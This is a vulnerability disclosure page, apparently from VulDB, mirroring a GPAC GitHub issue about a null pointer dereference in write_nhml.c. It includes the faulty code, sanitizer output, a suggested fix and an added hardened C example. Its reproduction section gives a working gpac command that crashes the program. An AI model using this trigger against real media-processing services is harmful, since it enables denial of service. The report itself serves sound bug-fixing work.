| Title | gpac v26.02.0 NULL Pointer Dereference |
|---|
| Description | **Disclosure:** This report was drafted with AI assistance and manually reviewed/verified before submission.
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [x] I looked for a similar issue and couldn't find any.
- [x] I tried with the latest version of GPAC. Installers available at https://gpac.io/downloads/gpac-nightly-builds/
- [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
## Summary
A null pointer dereference vulnerability exists in `src/filters/write_nhml.c` in the `nhmldump_send_frame()` function. The latest upstream build at commit `db3815307d1594fc34cb757d4509834a9d2e12bf` still triggers UBSan on the attached PoC/harness input.
## Vulnerability Details
**Validation Target:** Executable (`gpac` CLI)
**Location:** `src/filters/write_nhml.c:882`
**Vulnerable Code:**
```c
	} else if (ctx->is_stpp && ctx->nhmlonly) {
		sprintf(nhml, "<NHNTSubSample><![CDATA[\n");
		gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
		/* write_nhml.c:882: data is passed through unchecked; for a packet
		 * with no payload it is NULL, which gf_bs_write_data() forbids */
		gf_bs_write_data(ctx->bs_w, data, data_size);
		sprintf(nhml, "]]></NHNTSubSample>\n");
		gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
	}
	if (ctx->filep) {
		// dump sample opening tag
```
The sanitizer-confirmed reproducer reaches `nhmldump_send_frame()` on the latest upstream build and reports the fault at or immediately under this location.
## Root Cause
The code assumes required state is present and dereferences a pointer that can remain NULL for malformed input or partially initialized objects.
## Steps to Reproduce
### 1. Prepare the attached PoC / harness artifacts
Use the following already-validated artifacts from the public validation repository as the attachment set for the issue:
- [run_stpp_null_packet.sh](https://github.com/Bin-infinite/vuln-validations/blob/main/gpac/latest/case-004/pocs/run_stpp_null_packet.sh)
- [poc-command.txt](https://github.com/Bin-infinite/vuln-validations/blob/main/gpac/latest/case-004/inputs/poc-command.txt)
### 2. Build or use a sanitizer-enabled latest GPAC
I reproduced this on latest upstream HEAD `db3815307d1594fc34cb757d4509834a9d2e12bf` with a Clang ASan/UBSan build under Linux. Run the following commands from this validation directory after setting `GPAC_BIN` to the sanitizer-built `gpac` executable and `GPAC_REPO` to the matching GPAC source/build tree.
### 3. Trigger the vulnerability
```bash
ASAN_OPTIONS=detect_leaks=0:abort_on_error=1:symbolize=1 UBSAN_OPTIONS=halt_on_error=1:print_stacktrace=1 \
LD_LIBRARY_PATH="$(dirname "$GPAC_BIN")" "$GPAC_BIN" \
'fin:src=null:pck=10@0:ptime=1/1000:#CodecID=stpp:#StreamType=text' \
'nhmlw:nhmlonly' -o stpp-null-packet.nhml
```
## Expected Result
GPAC should reject the malformed input or invalid state gracefully without hitting sanitizer diagnostics, leaking memory, or crashing.
## Actual Result
```
utils/bitstream.c:1184:56: runtime error: null pointer passed as argument 2, which is declared to never be null
#0 0x7533424fb733 in gf_bs_write_data /tmp/gpac-latest-wt/src/utils/bitstream.c:1184:4
#1 0x7533436f85ac in nhmldump_send_frame /tmp/gpac-latest-wt/src/filters/write_nhml.c:882:3
#2 0x7533436f85ac in nhmldump_process /tmp/gpac-latest-wt/src/filters/write_nhml.c:1028:7
#3 0x75334324f15a in gf_filter_process_task /tmp/gpac-latest-wt/src/filter_core/filter.c:3253:7
#4 0x753343222344 in gf_fs_thread_proc /tmp/gpac-latest-wt/src/filter_core/filter_session.c:2418:3
#5 0x75334321ff34 in gf_fs_run /tmp/gpac-latest-wt/src/filter_core/filter_session.c:2726:3
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior utils/bitstream.c:1184:56
```
## Impact
- **Denial of Service**: malformed input can drive a null dereference and terminate the process
- **Attack Vector**: attackers can deliver crafted media files or graph descriptions that reach the affected code path
## Suggested Fix
Check all pointer-returning helpers and intermediate objects before dereference, and propagate a parse/validation error when required state is missing.
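Added example, not gpac's code and not part of the original report: a self-contained model of the `is_stpp && nhmlonly` branch with the check the suggested fix calls for applied before the payload reaches the writer. `mock_bs` and `mock_bs_write_data` are hypothetical stand-ins for gpac's `GF_BitStream` / `gf_bs_write_data`, which share memcpy's rule that the source must not be NULL.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical growable buffer standing in for gpac's GF_BitStream. */
typedef struct {
    char *buf;
    size_t len;
    size_t cap;
} mock_bs;

/* Stand-in for gf_bs_write_data(): like memcpy, its source must not be NULL.
 * Returns 0 on success, -1 on allocation failure. */
static int mock_bs_write_data(mock_bs *bs, const char *data, uint32_t size)
{
    if (bs->len + size > bs->cap) {
        size_t ncap = bs->cap ? bs->cap * 2 : 64;
        while (ncap < bs->len + size) ncap *= 2;
        char *nbuf = realloc(bs->buf, ncap);
        if (!nbuf) return -1;
        bs->buf = nbuf;
        bs->cap = ncap;
    }
    memcpy(bs->buf + bs->len, data, size); /* UB (the UBSan error) when data == NULL */
    bs->len += size;
    return 0;
}

/* Hardened form of the branch: the packet payload is validated before any
 * write. Returns 0 on success, -1 on a missing payload or write failure, so
 * the caller can propagate an error instead of crashing the process. */
int write_stpp_subsample(mock_bs *bs, const char *data, uint32_t size)
{
    static const char open_tag[]  = "<NHNTSubSample><![CDATA[\n";
    static const char close_tag[] = "]]></NHNTSubSample>\n";

    /* Non-zero size with no buffer means the packet state is inconsistent. */
    if (!data && size) return -1;
    if (mock_bs_write_data(bs, open_tag, (uint32_t)strlen(open_tag))) return -1;
    /* A zero-length packet (data may be NULL) yields an empty CDATA body;
     * the payload write is skipped rather than handing memcpy a NULL source. */
    if (size && mock_bs_write_data(bs, data, size)) return -1;
    return mock_bs_write_data(bs, close_tag, (uint32_t)strlen(close_tag));
}
```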
## Environment
- GPAC version: master branch / upstream HEAD `db3815307d1594fc34cb757d4509834a9d2e12bf`
- OS: Linux
- Compiler: Clang with ASan/UBSan (LSan enabled for leak cases)
|
|---|
| Source | https://github.com/gpac/gpac/issues/3596 |
|---|
| User | Kery Qi (UID 94424) |
|---|
| Submission | 06/06/2026 07:40 (30 days ago) |
|---|
| Moderation | 05/07/2026 18:07 (29 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 376379 [GPAC 26.02.0 Media File src/filters/write_nhml.c nhmldump_send_frame denial of service] |
|---|
| Points | 20 |
|---|